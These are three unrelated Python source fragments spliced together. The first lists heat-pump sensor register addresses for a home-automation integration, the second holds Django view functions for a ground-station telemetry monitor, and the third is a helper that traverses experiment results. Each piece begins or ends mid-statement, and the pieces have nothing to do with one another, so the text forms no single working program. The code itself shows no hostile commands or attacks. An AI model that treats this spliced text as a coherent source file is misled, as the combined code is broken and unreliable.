[label for bit, label in self.bit_labels.items() if value & bit != 0]
)
def entity_description(self, config_entry):
return SensorEntityDescription(
key=self.name,
name=f"{config_entry.data.get(CONF_DISPLAY_NAME)}: {SENSOR_NAMES.get(self.address)}",
device_class=self.device_class,
state_class=self.state_class,
)
def heat_circuit_sensors(circuit) -> List[IdmSensorAddress]:
"""data for heat circuit sensors"""
offset = ord(circuit) - ord("a")
return [
_FloatSensorAddress(
address=1350 + offset * 2,
name=f"temp_flow_current_circuit_{circuit}",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
max_value=100,
),
_FloatSensorAddress(
address=1364 + offset * 2,
name=f"temp_room_circuit_{circuit}",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
max_value=100,
),
_FloatSensorAddress(
address=1378 + offset * 2,
name=f"temp_flow_target_circuit_{circuit}",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
max_value=100,
),
_EnumSensorAddress(
address=1393 + offset,
name=f"mode_circuit_{circuit}",
value_labels={
0: "off",
1: "timed",
2: "normal",
3: "eco",
4: "manual_heat",
5: "manual_cool",
},
device_class=None,
state_class=None,
),
_FloatSensorAddress(
address=1401 + offset * 2,
name=f"temp_room_target_heating_normal_circuit_{circuit}",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
min_value=15,
max_value=30,
),
_FloatSensorAddress(
address=1415 + offset * 2,
name=f"temp_room_target_heating_eco_circuit_{circuit}",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
min_value=10,
max_value=25,
),
_FloatSensorAddress(
address=1429 + offset * 2,
name=f"curve_circuit_{circuit}",
unit=None,
device_class=None,
state_class=None,
min_value=0.1,
max_value=3.5,
),
_UCharSensorAddress(
address=1442 + offset * 2,
name=f"temp_threshold_heating_circuit_{circuit}",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
max_value=50,
),
_UCharSensorAddress(
address=1449 + offset * 2,
name=f"temp_flow_target_constant_circuit_{circuit}",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
min_value=20,
max_value=90,
),
_FloatSensorAddress(
address=1457 + offset * 2,
name=f"temp_room_target_cooling_normal_circuit_{circuit}",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
min_value=15,
max_value=30,
),
_FloatSensorAddress(
address=1471 + offset * 2,
name=f"temp_room_target_cooling_eco_circuit_{circuit}",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
min_value=15,
max_value=30,
),
_UCharSensorAddress(
address=1484 + offset,
name=f"temp_threshold_cooling_circuit_{circuit}",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
max_value=36,
),
_UCharSensorAddress(
address=1491 + offset,
name=f"temp_flow_target_cooling_circuit_{circuit}",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
min_value=8,
max_value=30,
),
_EnumSensorAddress(
address=1498 + offset,
name=f"mode_active_circuit_{circuit}",
value_labels={
0: "off",
1: "heating",
2: "cooling",
},
device_class=None,
state_class=None,
),
_UCharSensorAddress(
address=1505 + offset,
name=f"curve_offset_{circuit}",
unit=PERCENTAGE,
device_class=None,
state_class=None,
min_value=0,
max_value=30,
),
]
SENSOR_ADDRESSES: Dict[str, IdmSensorAddress] = {
s.name: s
for s in [
_FloatSensorAddress(
address=1000,
name="temp_outside",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_FloatSensorAddress(
address=1002,
name="temp_outside_avg",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_UCharSensorAddress(
address=1004,
name="failure_id",
unit="",
device_class=None,
state_class=None,
),
_EnumSensorAddress(
address=1005,
name="status_system",
value_labels={
0: "standby",
1: "automatic",
2: "away",
4: "hot_water_only",
5: "heating_cooling_only",
},
device_class=None,
state_class=None,
),
_EnumSensorAddress(
address=1006,
name="status_smart_grid",
value_labels={
0: "grid_blocked_solar_off",
1: "grid_allowed_solar_off",
2: "grid_unused_solar_on",
4: "grid_blocked_solar_on",
},
device_class=None,
state_class=None,
),
_FloatSensorAddress(
address=1008,
name="temp_heat_storage",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_FloatSensorAddress(
address=1010,
name="temp_cold_storage",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_FloatSensorAddress(
address=1012,
name="temp_water_heater_top",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_FloatSensorAddress(
address=1014,
name="temp_water_heater_bottom",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_FloatSensorAddress(
address=1030,
name="temp_water_heater_tap",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_UCharSensorAddress(
address=1032,
name="temp_water_target",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
min_value=35,
max_value=95,
),
_UCharSensorAddress(
address=1033,
name="temp_water_switch_on",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
min_value=30,
max_value=50,
),
_UCharSensorAddress(
address=1034,
name="temp_water_switch_off",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
min_value=46,
max_value=53,
),
_FloatSensorAddress(
address=1048,
name="price_energy",
unit=CURRENCY_EURO,
scale=0.001,
device_class=SensorDeviceClass.MONETARY,
state_class=SensorStateClass.MEASUREMENT,
),
_FloatSensorAddress(
address=1050,
name="temp_heat_pump_flow",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_FloatSensorAddress(
address=1052,
name="temp_heat_pump_return",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_FloatSensorAddress(
address=1054,
name="temp_hgl_flow",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_FloatSensorAddress(
address=1056,
name="temp_heat_source_input",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_FloatSensorAddress(
address=1058,
name="temp_heat_source_output",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_FloatSensorAddress(
address=1060,
name="temp_air_input",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_FloatSensorAddress(
address=1062,
name="temp_air_heat_exchanger",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_FloatSensorAddress(
address=1064,
name="temp_air_input_2",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_BitFieldSensorAddress(
address=1090,
name="status_heat_pump",
bit_labels={
0: "off",
1: "heating",
2: "cooling",
4: "water",
8: "defrosting",
},
device_class=None,
state_class=None,
),
_WordSensorAddress(
address=1104,
name="load_charge_pump",
unit=PERCENTAGE,
device_class=None,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
max_value=100,
),
_WordSensorAddress(
address=1105,
name="load_brine_pump",
unit=PERCENTAGE,
device_class=None,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
max_value=100,
),
_WordSensorAddress(
address=1106,
name="load_ground_water_pump",
unit=PERCENTAGE,
device_class=None,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
max_value=100,
),
_WordSensorAddress(
address=1108,
name="load_isc_cold_storage_pump",
unit=PERCENTAGE,
device_class=None,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
max_value=100,
),
_WordSensorAddress(
address=1109,
name="load_isc_recooling_pump",
unit=PERCENTAGE,
device_class=None,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
max_value=100,
),
_WordSensorAddress(
address=1110,
name="valve_state_circuit_heating_cooling",
unit=PERCENTAGE,
device_class=None,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
max_value=100,
),
_WordSensorAddress(
address=1111,
name="valve_state_storage_heating_cooling",
unit=PERCENTAGE,
device_class=None,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
max_value=100,
),
_WordSensorAddress(
address=1112,
name="valve_state_main_heating_water",
unit=PERCENTAGE,
device_class=None,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
max_value=100,
),
_WordSensorAddress(
address=1113,
name="valve_state_source_heating_cooling",
unit=PERCENTAGE,
device_class=None,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
max_value=100,
),
_WordSensorAddress(
address=1114,
name="valve_state_solar_heating_water",
unit=PERCENTAGE,
device_class=None,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
max_value=100,
),
_WordSensorAddress(
address=1115,
name="valve_state_solar_storage_source",
unit=PERCENTAGE,
device_class=None,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
max_value=100,
),
_WordSensorAddress(
address=1116,
name="valve_state_isc_heating_cooling",
unit=PERCENTAGE,
device_class=None,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
max_value=100,
),
_WordSensorAddress(
address=1120,
name="temp_second_source_bivalence_1",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
min_value=-30,
max_value=40,
),
_WordSensorAddress(
address=1121,
name="temp_second_source_bivalence_2",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
min_value=-30,
max_value=40,
),
_WordSensorAddress(
address=1122,
name="temp_third_source_bivalence_1",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
min_value=-30,
max_value=40,
),
_WordSensorAddress(
address=1123,
name="temp_third_source_bivalence_2",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
min_value=-30,
max_value=40,
),
_UCharSensorAddress(
address=1150,
name="count_running_compressor_stages_heating",
unit=None,
device_class=None,
state_class=SensorStateClass.MEASUREMENT,
),
_UCharSensorAddress(
address=1151,
name="count_running_compressor_stages_cooling",
unit=None,
device_class=None,
state_class=SensorStateClass.MEASUREMENT,
),
_UCharSensorAddress(
address=1152,
name="count_running_compressor_stages_water",
unit=None,
device_class=None,
state_class=SensorStateClass.MEASUREMENT,
),
*heat_circuit_sensors("a"),
*heat_circuit_sensors("b"),
*heat_circuit_sensors("c"),
*heat_circuit_sensors("d"),
# *heat_circuit_sensors("e"),
# *heat_circuit_sensors("f"),
# *heat_circuit_sensors("g"),
_FloatSensorAddress(
address=1392,
name="humidity",
unit=PERCENTAGE,
device_class=SensorDeviceClass.HUMIDITY,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
max_value=100,
),
_UCharSensorAddress(
address=1694,
name="temp_external_request_heating",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
min_value=20,
max_value=65,
),
_UCharSensorAddress(
address=1695,
name="temp_external_request_cooling",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
min_value=10,
max_value=25,
),
_FloatSensorAddress(
address=1750,
name="energy_heat_total",
unit=ENERGY_KILO_WATT_HOUR,
device_class=SensorDeviceClass.ENERGY,
state_class=SensorStateClass.TOTAL_INCREASING,
min_value=0,
),
_FloatSensorAddress(
address=1752,
name="energy_heat_total_cooling",
unit=ENERGY_KILO_WATT_HOUR,
device_class=SensorDeviceClass.ENERGY,
state_class=SensorStateClass.TOTAL_INCREASING,
min_value=0,
),
_FloatSensorAddress(
address=1754,
name="energy_heat_total_water",
unit=ENERGY_KILO_WATT_HOUR,
device_class=SensorDeviceClass.ENERGY,
state_class=SensorStateClass.TOTAL_INCREASING,
min_value=0,
),
_FloatSensorAddress(
address=1756,
name="energy_heat_total_defrost",
unit=ENERGY_KILO_WATT_HOUR,
device_class=SensorDeviceClass.ENERGY,
state_class=SensorStateClass.TOTAL_INCREASING,
min_value=0,
),
_FloatSensorAddress(
address=1758,
name="energy_heat_total_passive_cooling",
unit=ENERGY_KILO_WATT_HOUR,
device_class=SensorDeviceClass.ENERGY,
state_class=SensorStateClass.TOTAL_INCREASING,
min_value=0,
),
_FloatSensorAddress(
address=1760,
name="energy_heat_total_solar",
unit=ENERGY_KILO_WATT_HOUR,
device_class=SensorDeviceClass.ENERGY,
state_class=SensorStateClass.TOTAL_INCREASING,
min_value=0,
),
_FloatSensorAddress(
address=1762,
name="energy_heat_total_electric",
unit=ENERGY_KILO_WATT_HOUR,
device_class=SensorDeviceClass.ENERGY,
state_class=SensorStateClass.TOTAL_INCREASING,
min_value=0,
),
_FloatSensorAddress(
address=1790,
name="power_current",
unit=POWER_KILO_WATT,
device_class=SensorDeviceClass.POWER,
state_class=SensorStateClass.MEASUREMENT,
),
_FloatSensorAddress(
address=1792,
name="power_current_solar",
unit=POWER_KILO_WATT,
device_class=SensorDeviceClass.POWER,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
),
_FloatSensorAddress(
address=1850,
name="temp_solar_collector",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_FloatSensorAddress(
address=1852,
name="temp_solar_collector_return",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_FloatSensorAddress(
address=1854,
name="temp_solar_charge",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_EnumSensorAddress(
address=1856,
name="mode_solar",
value_labels={
0: "auto",
1: "water",
2: "heating",
3: "water_heating",
4: "source_pool",
},
device_class=None,
state_class=None,
),
_FloatSensorAddress(
address=1857,
name="temp_solar_reference",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_FloatSensorAddress(
address=1870,
name="temp_isc_charge_cooling",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_FloatSensorAddress(
address=1872,
name="temp_isc_recooling",
unit=TEMP_CELSIUS,
device_class=SensorDeviceClass.TEMPERATURE,
state_class=SensorStateClass.MEASUREMENT,
),
_BitFieldSensorAddress(
address=1874,
name="mode_isc",
bit_labels={
0: "none",
1: "heating",
4: "water",
8: "source",
},
device_class=None,
state_class=None,
),
_FloatSensorAddress(
address=74,
name="power_solar_surplus",
unit=POWER_KILO_WATT,
device_class=SensorDeviceClass.POWER,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
),
_FloatSensorAddress(
address=78,
name="power_solar_production",
unit=POWER_KILO_WATT,
device_class=SensorDeviceClass.POWER,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
),
_FloatSensorAddress(
address=4122,
name="power_current_draw",
unit=POWER_KILO_WATT,
device_class=SensorDeviceClass.POWER,
state_class=SensorStateClass.MEASUREMENT,
min_value=0,
),
]
}
BINARY_SENSOR_ADDRESSES: Dict[str, IdmBinarySensorAddress] = {
sensor.name: sensor
for sensor in [
IdmBinarySensorAddress(
address=1099,
name="failure_heat_pump",
device_class=BinarySensorDeviceClass.PROBLEM,
),
IdmBinarySensorAddress(
address=1100,
name="failure_compressor_1",
device_class=BinarySensorDeviceClass.PROBLEM,
),
IdmBinarySensorAddress(
address=1101,
name="failure_compressor_2",
device_class=BinarySensorDeviceClass.PROBLEM,
),
IdmBinarySensorAddress(
address=1102,
name="failure_compressor_3",
device_class=BinarySensorDeviceClass.PROBLEM,
),
IdmBinarySensorAddress(
address=1103,
name="failure_compressor_4",
device_class=BinarySensorDeviceClass.PROBLEM,
| |
# Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""View functions to interact with web clients."""
import atexit
import json
import logging
import os
import re
import string
import time
from django import http
from django import shortcuts
from django import template
from django.core import urlresolvers
from makani.analysis.checks import log_util
from makani.avionics.network import message_type as aio_message_type
from makani.avionics.network import network_config
from makani.gs.monitor2.apps.layout import autogen
from makani.gs.monitor2.apps.layout import base as layout_base
from makani.gs.monitor2.apps.layout import layout_util
from makani.gs.monitor2.apps.layout import loader
from makani.gs.monitor2.apps.layout import memory as layout_memory
from makani.gs.monitor2.apps.layout import stoplights
from makani.gs.monitor2.apps.layout import widgets
from makani.gs.monitor2.apps.receiver import receiver_manager
from makani.gs.monitor2.apps.receiver import views as receiver_views
from makani.gs.monitor2.project import settings
from makani.lib.bazel import bazel_util
from makani.lib.python import c_helpers
from makani.lib.python import debug_util
from makani.lib.python import struct_tree
from makani.lib.python.h5_utils import h5_io
import numpy
MESSAGE_TYPE_HELPER = c_helpers.EnumHelper('MessageType', aio_message_type)
CONFIG_FILES = {
'plot_defs': os.path.join(settings.MONITOR_PATH, 'configs/plot_defs.json'),
}
def Home(request):
"""Get the response for the home page."""
layout_names = loader.LayoutLoader().Names()
layout_names.sort()
all_layouts = [
{'name': layout,
'url': urlresolvers.reverse(
'view_aio_layout', args=[loader.LayoutLoader().ModuleName(layout)])}
for layout in layout_names]
context = {
'layouts': all_layouts,
'canvas_cols': settings.CSS_GRID_COLUMNS,
}
_CreateAndAddClientIdToContext(context)
template_name = 'home.html'
return shortcuts.render(request, template_name, context,
context_instance=template.RequestContext(request))
def _ListFiles(path_arg):
"""List files under a local path."""
path_template = string.Template(path_arg)
prefix_path = path_template.substitute(os.environ)
sub_paths = os.listdir(prefix_path)
return prefix_path, sub_paths
def _GetFullFilePath(prefix_path, sub_path):
return os.path.join(prefix_path, sub_path)
def SelectAllLogs(request):
"""Select all logs in the last visited directory."""
current_path = request.session['current_path']
try:
prefix_path, sub_paths = _ListFiles(current_path)
except OSError:
return http.HttpResponse('Cannot list directory "%s"!' % current_path)
file_list = []
for sub_path in sorted(sub_paths):
# Construct the full path.
if sub_path.endswith('.h5') and not sub_path.startswith('format'):
full_path = _GetFullFilePath(prefix_path, sub_path)
if not os.path.isdir(full_path):
file_list.append(full_path)
return http.HttpResponse(';\n'.join(file_list))
def Console(request, command, args):
"""Take commandlines from the client and respond with console outputs.
Args:
request: The HTML resquest object.
command: The command to be run. Only 'ls' is permitted for now.
args: The string of arguments to the command.
Returns:
The HttpResponse telling the output of the command.
"""
if command != 'ls':
message = 'Command "%s" is not allowed.' % command
return http.HttpResponse(message)
arg_template = string.Template(args)
arg_path = arg_template.safe_substitute(
{'MAKANI_HOME': bazel_util.GetWorkspaceRoot()})
try:
prefix_path, sub_paths = _ListFiles(arg_path)
request.session['current_path'] = arg_path
except OSError:
return http.HttpResponse('Cannot list directory "%s"!' % arg_path)
file_list = []
for sub_path in sorted(sub_paths):
# Construct the full path.
full_path = _GetFullFilePath(prefix_path, sub_path)
if os.path.isdir(full_path):
# If this is a directory, add the javascript to allow users to click
# into it.
file_list.append(
'<a href="javascript:void(0)" onclick="onListFiles(\'%s\')">%s</a>'
% (full_path, sub_path))
elif sub_path.endswith('.h5') and not sub_path.startswith('format'):
# If this is an HDF5 file, add the javascript to allow users to
# visualize it.
file_list.append(
'<a href="javascript:void(0)" onclick="onAddLog(\'%s\')">%s</a>'
% (full_path, sub_path))
else:
file_list.append(sub_path)
text = '<br>'.join(file_list)
return http.HttpResponse(text)
def _GetMinMessageFrequency():
"""Get the minimum frequency across all message types."""
config = network_config.NetworkConfig(settings.NETWORK_YAML)
return min(m.frequency_hz for m in config.all_messages if m.frequency_hz > 0)
def _TryToEnforceAioReceiver(client_id):
"""Ensure that the client is subscribed to the AioReceiver."""
# TODO: Investigate always running the AioReceiver.
message_receiver = receiver_manager.ReceiverManager.GetReceiver(client_id)
if not message_receiver:
if receiver_manager.ReceiverManager.CheckAndStartAioReceiver(
client_id, receiver_views.CreateAioReceiver):
# A new AioReceiver is started.
# Get the longest period for all messages, and multiply it by two to
# make sure we do not miss any message.
time.sleep(2.0 / _GetMinMessageFrequency())
return receiver_manager.ReceiverManager.GetReceiver(client_id)
else:
return message_receiver
def ViewMessageType(request, client_id, message_type,
template_name='monitor.html'):
"""View information within a message by automatically generating a layout.
Args:
request: An HttpRequest from the client.
client_id: The ID of the client's browser tab.
message_type: The Enum name of a message type.
template_name: The HTML template used to render the layout.
Returns:
An HttpResponse in the format of a serialized JSON object.
"""
configs = _LoadConfigs()
_TryToEnforceAioReceiver(client_id)
resp = _GetMessage(request, client_id, message_type)
resp = resp.Data(convert_to_basic_types=True) if resp else {}
configs['scenarios'] = autogen.GenerateScenario(resp, message_type)
context = _PrepareContext(configs)
new_client_id = _CreateAndAddClientIdToContext(context)
context['periodic_url'] = '/dashboard/periodic/msg_enum/%s/%s' % (
new_client_id, message_type)
context['content_width'] = settings.CSS_GRID_COLUMNS
context['order_horizontally'] = True
return shortcuts.render(request, template_name, context,
context_instance=template.RequestContext(request))
def UpdateMessageOptions(unused_request, client_id):
"""Detect what messages have been received and update the client.
Args:
unused_request: An HttpRequest from the client.
client_id: The ID of the client's browser tab.
Returns:
An HttpResponse about a dictionary of {message_enum: message_short_name}
"""
message_receiver = _TryToEnforceAioReceiver(client_id)
info = message_receiver.GetReceivedMessageTypes() if message_receiver else []
return http.HttpResponse(json.dumps(info))
def ViewAioLayout(request, layout_name):
"""Open a monitor layout that get data from AIO.
Args:
request: An HttpRequest from the client.
layout_name: Name of the layout associated with the client.
Returns:
An HttpResponse in the format of a serialized JSON object.
"""
context = {'receiver_type': 'aio'}
return _ViewLayout(request, layout_name, context)
def BrowseLog(request, path):
"""Browse the log by expanding the field at `path`.
Args:
request: An HttpRequest from the client.
path: A path pointing to one field in the log.
Returns:
An HttpResponse serializing a list of names for child fields.
"""
# The log structure may differ across logs, we always use the first log to
# construct the log structure.
log_path = request.session['log_paths'][0]
log_data = struct_tree.StructTree(log_path, fail_silently=True, readonly=True)
try:
skeleton = log_data.Skeleton(path, depth=1)
except h5_io.H5IndexError:
return http.HttpResponse('{}')
parent_path = path
d3_data = struct_tree.DictToD3Tree(skeleton, '.', parent_path)
if 'children' in d3_data:
# The first layer is a placeholder. Starts from the second layer.
return http.HttpResponse(json.dumps(d3_data['children']))
else:
return http.HttpResponse('{}')
def ViewLogStructure(request, paths, template_name='log_structure.html'):
"""View structure of an HDF5 log at given log path.
Args:
request: An HttpRequest from the client.
paths: Paths to the local log files.
template_name: The HTML template used to render the layout.
Returns:
An HttpResponse that renders the log structure.
"""
# `context` includes variables used to render the HTML.
context = {
'graph_width': 6000,
'graph_height': 6000,
'frame_width': 200,
'frame_height': 540,
'canvas_cols': 12,
}
log_paths = []
for path in paths.split(';'):
path = path.strip()
if not path:
continue
path_template = string.Template(path)
log_path = path_template.substitute(os.environ)
basename = os.path.basename(log_path)
if basename.startswith('(') and basename.endswith(')'):
dirname = os.path.dirname(log_path)
regex_pattern = re.compile(basename[1:-1]+'$')
filenames = os.listdir(dirname)
matched_files = [f for f in filenames if regex_pattern.match(f)]
log_paths += [os.path.join(dirname, f) for f in matched_files]
else:
log_paths.append(log_path)
if not log_paths:
context['errors'] = 'Cannot find log data'
else:
# Use the first log to index fields.
log_data = struct_tree.StructTree(
log_paths[0], fail_silently=True, readonly=True)
log_skeleton = log_data.Skeleton(depth=1)
d3_data = struct_tree.DictToD3Tree(log_skeleton, '/')
d3_data['expand_url'] = urlresolvers.reverse('browse_log', args=[''])
request.session['log_paths'] = log_paths
context['skeleton'] = json.dumps(d3_data)
order_horizontally = True
configs = _LoadConfigs()
scenarios = layout_base.AssembleLayout([
('Signals', [
widgets.DictLinesWidget('series', None, interactive=True,
use_markers=True),
]),
], desired_view_cols=1, order_horizontally=order_horizontally)
layout_names = loader.LayoutLoader().ModuleNames()
layout_names.sort()
configs['scenarios'] = scenarios
context.update(_PrepareContext(configs))
context['layout_names'] = layout_names
context['content_width'] = settings.CSS_GRID_COLUMNS - 2
context['order_horizontally'] = order_horizontally
_CreateAndAddClientIdToContext(context)
return shortcuts.render(request, template_name, context,
context_instance=template.RequestContext(request))
def PeriodicDataPoll(request, client_id, layout_name):
"""Compute realtime data and respond to periodic polling from a client layout.
Args:
request: An HttpRequest from the client.
client_id: The ID of the client's browser tab.
layout_name: Name of the layout associated with the client.
Returns:
An HttpResponse in the format of a serialized JSON object.
"""
aggregated_message = _GetMessage(request, client_id)
if not aggregated_message:
aggregated_message = struct_tree.StructTree(
{}, fail_silently=True, readonly=True)
layout = loader.LayoutLoader().GetLayoutByModuleName(layout_name)
tab_memory = layout_memory.GetMemory(client_id, False)
if tab_memory is not None:
# Load the persistent memory.
layout.Import(tab_memory)
else:
layout.Initialize()
tab_memory = layout_memory.GetMemory(client_id, True)
# Start the AIO receiver in case the server has restarted.
_TryToEnforceAioReceiver(client_id)
try:
data = layout.Filter(aggregated_message)
except Exception: # pylint: disable=broad-except
# layout.Filter may introduce any kind of exception.
logging.error('PeriodicDataPoll encountered an error:\n%s',
debug_util.FormatTraceback())
layout.Export(tab_memory)
return http.HttpResponse('{}')
# Save the persistent memory.
layout.Export(tab_memory)
resp = data.Json()
if settings.DEBUG:
resp['__message__'] = '\n-----------------------------\n'.join(
'Error in indicator "%s":\n%s' % (k, v)
for k, v in layout.ErrorReport())
resp_str = json.dumps(resp)
layout.ClearErrors()
return http.HttpResponse(resp_str)
def _DownSample(data, length):
window_size = max(1, len(data)/length)
if window_size > 1:
data = data[:len(data) / window_size * window_size]
return numpy.mean(data.reshape(-1, window_size), 1), window_size
else:
return data, 1
def GetLogData(request, mode, fields):
"""Get values of data fields within a log file."""
log_paths = request.session['log_paths']
fields = [f.strip() for f in fields.split('\n') if f.strip()]
field_labels = layout_util.GetDistinguishableNames(
fields, '.', ['kAioNode', 'kMessageType'])
if mode | |
this call (one
particular combination of agent, environment and agent parameter name, and environment and
agent parameter value at a time).
:return: Dictionary with organised data.
"""
agent = kwargs.get('agent')
env_key = kwargs.get('env_param')
env_val = kwargs.get('env_val')
agent_key = kwargs.get('agent_param')
agent_value = kwargs.get('agent_val')
for v in exp_run:
val_results_list[agent][env_key][env_val][agent_key][v].append((agent_value, exp_run[v]))
return val_results_list
def traverse_experiments(exp_runs,
function_on_data: Callable,
func_param: Any,
data_keys: Union[str, List[str]],
agent_keys: Optional[Union[str, List[str]]] = None,
env_keys: Optional[Union[str, List[str]]] = None,
mode: str = 'disaggregate'):
"""
Process data stored in exp_runs. Data is traversed taking into account agent, and possibly
environment and agent parameters and their values.
:param exp_runs: Nested dictionary with all data logs separated by agent, data variable and
maybe by environment and agent parameters and their values.
:param function_on_data: Function to process the data.
:param func_param: Extra parameters to be passed to the function that will process the data.
:param data_keys: String or list of strings with the keys of the data variables to be
processed.
:param agent_keys: Optional string or list of strings with the agent parameter keys according to
which data should be separated when being processed.
:param env_keys: Optional string or list of strings with the environment parameter keys
according to which data should be separated when being processed.
:param mode: Specify how the results should be returned:
- aggregate: Return one single result per data variable for all experiments (i.e. agents,
and possibly environment and agent parameters and their values).
- disaggregate: Return dictionary with processed data separated by agent and per variable,
and possibly per agent and environment parameters and their values.
:return result: Result from the function after traversed the data.
"""
new_exp_runs = create_results_container(agent_keys, env_keys, dict)
for agent in exp_runs.keys(): # Traverse agents.
func_param['agent'] = agent
for k in data_keys: # Traverse data variables.
func_param['variable'] = k
if env_keys: # Per environment parameter disaggregation.
for e in env_keys: # Traverse env parameters.
func_param['env_param'] = e
for e_val in exp_runs[agent][e].keys(): # Traverse values per env parameter.
func_param['env_val'] = e_val
if agent_keys: # Per agent parameter disaggregation.
for p in agent_keys: # Traverse agent parameters.
func_param['agent_param'] = p
# Traverse values per agent parameter.
for p_val in exp_runs[agent][e][e_val][p].keys():
func_param['agent_val'] = p_val
result = function_on_data(
exp_runs[agent][e][e_val][p][p_val][k], **func_param)
if mode == 'disaggregate': # Store disaggregated.
